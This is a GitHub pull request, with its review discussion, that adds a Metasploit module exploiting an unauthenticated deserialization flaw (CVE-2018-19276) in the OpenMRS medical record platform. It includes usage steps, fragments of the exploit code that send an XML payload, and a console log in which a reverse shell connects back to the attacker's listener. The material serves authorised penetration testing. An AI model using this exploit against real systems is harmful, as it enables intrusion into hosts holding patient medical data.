### PR TITLE
Add OpenMRS deserialization exploit

### PR DESCRIPTION
**Pull request by space-r7**
OpenMRS is an open-source platform that supplies users with a customizable medical record system.

There exists an object deserialization vulnerability in the `webservices.rest` module used in OpenMRS Platform for versions below `v2.24.0`. Unauthenticated remote code
execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as `/ws/rest/v1/concept`.

## Verification

- [x] Install the application
- [x] Start msfconsole
- [x] Do: ```use exploit/multi/http/openmrs_deserialization```
- [x] Do: ```set TARGETURI <uri>```
- [x] Do: ```set RHOSTS <ip>```
- [x] Do: ```run```
- [x] You should get a shell.

## Scenarios

```
  msf5 > use exploit/multi/http/openmrs_deserialization
  msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168
  rhosts => 192.168.37.168
  msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
  targeturi => /openmrs-standalone
  msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/http/openmrs_deserialization) > check
  [*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
  msf5 exploit(multi/http/openmrs_deserialization) > run

  [*] Started reverse TCP double handler on 192.168.37.1:4444
  [*] Target is running OpenMRS
  [*] Formatting payload
  [*] Sending payload...
  [*] Accepted the first client connection...
  [*] Accepted the second client connection...
  [*] Command: echo wKYK4x9ZOHJ37tm7;
  [*] Writing to socket A
  [*] Writing to socket B
  [*] Reading from sockets...
  [*] Reading from socket B
  [*] B: "wKYK4x9ZOHJ37tm7\r\n"
  [*] Matching...
  [*] A is input...
  [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600

  whoami
  space
  id
  uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
```

### CODE REVIEW

File: modules/exploits/multi/http/openmrs_deserialization.rb [hunk 1]
```diff
@@ -0,0 +1,140 @@
...
+    send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  rest_uri,
+      'headers'   =>  { 'Content-Type'  =>  'text/xml' },
+      'data'      =>  payload_data
+    )
+  end
+
+  def xml_encode(str)
+    str.gsub!(/&/, '&amp;')
```
Comment (wvu-r7) [inline modules/exploits/multi/http/openmrs_deserialization.rb]: What about `str.encode(xml: :text)`?

File: modules/exploits/multi/http/openmrs_deserialization.rb [hunk 2]
```diff
@@ -0,0 +1,140 @@
...
+       [
+         [ 'Linux',
+           {
+             'Arch'            =>  ARCH_CMD,
+             'Platform'        =>  'unix',
+             'Payload'         =>  'cmd/unix/reverse',
+           }
+         ]
+       ],
+      'DisclosureDate' => "2019-02-04",
```
Comment (wvu-r7) [inline modules/exploits/multi/http/openmrs_deserialization.rb]: Single quotes?

File: modules/exploits/multi/http/openmrs_deserialization.rb (hunk 1 above)
Comment (wvu-r7) [reply modules/exploits/multi/http/openmrs_deserialization.rb]: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_rest_xstream.rb#L115-L116

File: documentation/modules/exploit/multi/http/openmrs_deserialization.md [hunk 3]
```diff
@@ -0,0 +1,69 @@
...
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/openmrs_deserialization```
+  4. Do: ```set TARGETURI <uri>```
+  5. Do: ```set RHOSTS <ip>```
+  6. Do: ```run```
+  7. You should get a shell.
+
+## Options
+
+  **ForceExploit**
```
Comment (bcoles) [inline documentation/modules/exploit/multi/http/openmrs_deserialization.md]: Advanced options *usually* aren't documented.

File: modules/exploits/multi/http/openmrs_deserialization.rb [hunk 4]
```diff
@@ -0,0 +1,135 @@
...
+      'References'     =>
+       [
+         [ 'CVE', '2018-19276' ],
+         [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
+         [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
+         [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
+       ],
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
```
Comment (bcoles) [inline modules/exploits/multi/http/openmrs_deserialization.rb]: Is a command stager a viable target?

File: modules/exploits/multi/http/openmrs_deserialization.rb [hunk 5]
```diff
@@ -0,0 +1,135 @@
...
+    payload_arr = payload_data.split(' ', 3)
+
+    formatted_payload = ''
+    print_status('Formatting payload')
+    payload_arr.each do |arg|
+      formatted_payload << "<string>#{arg}</string>"
+    end
+
+    formatted_payload.gsub!("'", "")
+  end
```
Comment (bcoles) [inline modules/exploits/multi/http/openmrs_deserialization.rb]: Golfed, and removed `print_status` as it seemed a little unnecessary:

```ruby
  def format_payload
    payload_data = payload.encoded.to_s.encode(xml: :text)
    payload_arr = payload_data.split(' ', 3)
    payload_arr.map {|arg| "<string>#{arg}</string>"}.join.gsub("'", "")
  end
```

File: modules/exploits/multi/http/openmrs_deserialization.rb [hunk 6]
```diff
@@ -0,0 +1,135 @@
...
+    res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
+    return CheckCode::Unknown("OpenMRS page unreachable.") unless res
+
+    return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs')
+    response = res.get_html_document
+    version = response.at('body//h3')
+    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text
+
+    version_no = version.text
+    version_no = version_no.match(/\d\.\d+\.\d*/)
```
Comment (bcoles) [inline modules/exploits/multi/http/openmrs_deserialization.rb]: Future proofing:

```suggestion
    version_no = version_no.match(/\d+\.\d+\.\d*/)
```

File: modules/exploits/multi/http/openmrs_deserialization.rb [hunk 7]
```diff
@@ -0,0 +1,135 @@
...
+    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no
+
+    version_no = Gem::Version.new(version_no)
+    not_vuln = Gem::Version.new('2.1.4')
+
+    return CheckCode::Appears("OpenMRS platform version: #{version_no}") if (version_no < not_vuln) && ![ Gem::Version.new('1.11.8'), Gem::Version.new('1.11.9') ].include?(version_no)
```
Comment (bcoles) [inline modules/exploits/multi/http/openmrs_deserialization.rb]: Is `1.11.9` guaranteed to be the end of the `1.11.x` branch, and versions `< 1.11.8` vulnerable?

Also, the conditional line is egregiously long, weighing in at a staggering 183 bytes.

I presume the logic here is meant to describe that the target is vulnerable so long as the version is `2.x < 2.1.4` or `< 1.11.8`; in which case:

```ruby
version_no = Gem::Version.new(version_no)

if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3'))
  return CheckCode::Appears("OpenMRS platform version: #{version_no}")
end
```

File: modules/exploits/multi/http/openmrs_deserialization.rb [hunk 8]
```diff
@@ -0,0 +1,135 @@
...
+
+    CheckCode::Detected
```
Comment (bcoles) [inline modules/exploits/multi/http/openmrs_deserialization.rb]: I presume the target is `Safe` if the version is successfully identified, and identified to be higher than the known vulnerable versions.

```suggestion
    CheckCode::Safe
```

File: modules/exploits/multi/http/openmrs_deserialization.rb (hunk 4 above)
Comment (space-r7) [reply modules/exploits/multi/http/openmrs_deserialization.rb]: I didn't have much luck with any previously, but I'll try it out once more.

File: modules/exploits/multi/http/openmrs_deserialization.rb (hunk 7 above)
Comment (space-r7) [reply modules/exploits/multi/http/openmrs_deserialization.rb]: The vulnerability writeup from [bishopfox](https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization) mentions that specifically `v1.11.8` and `v.1.11.9` are not vulnerable. All of the other versions should be included.

Comment (bcoles) [reply modules/exploits/multi/http/openmrs_deserialization.rb]: Interesting

OpenMRS vulnerable versions

It looks like `1.11.9`, released in early 2018, was the last of the `1.11.x` branch. It's probably safe to assume that all `1.11.x` versions from `1.11.8` onward are unaffected, but up to you.

Comment (space-r7) [reply modules/exploits/multi/http/openmrs_deserialization.rb]: Welp, I thought there were more than that. Made your suggested change!

File: modules/exploits/multi/http/openmrs_deserialization.rb (hunk 4 above)
Comment (space-r7) [reply modules/exploits/multi/http/openmrs_deserialization.rb]: Updated with a command stager.

**Comment by busterb** [comment]
## Release Notes

This adds an object deserialization exploit module for OpenMRS, an open-source platform that supplies users with a customizable medical record system.

**Pull request merged**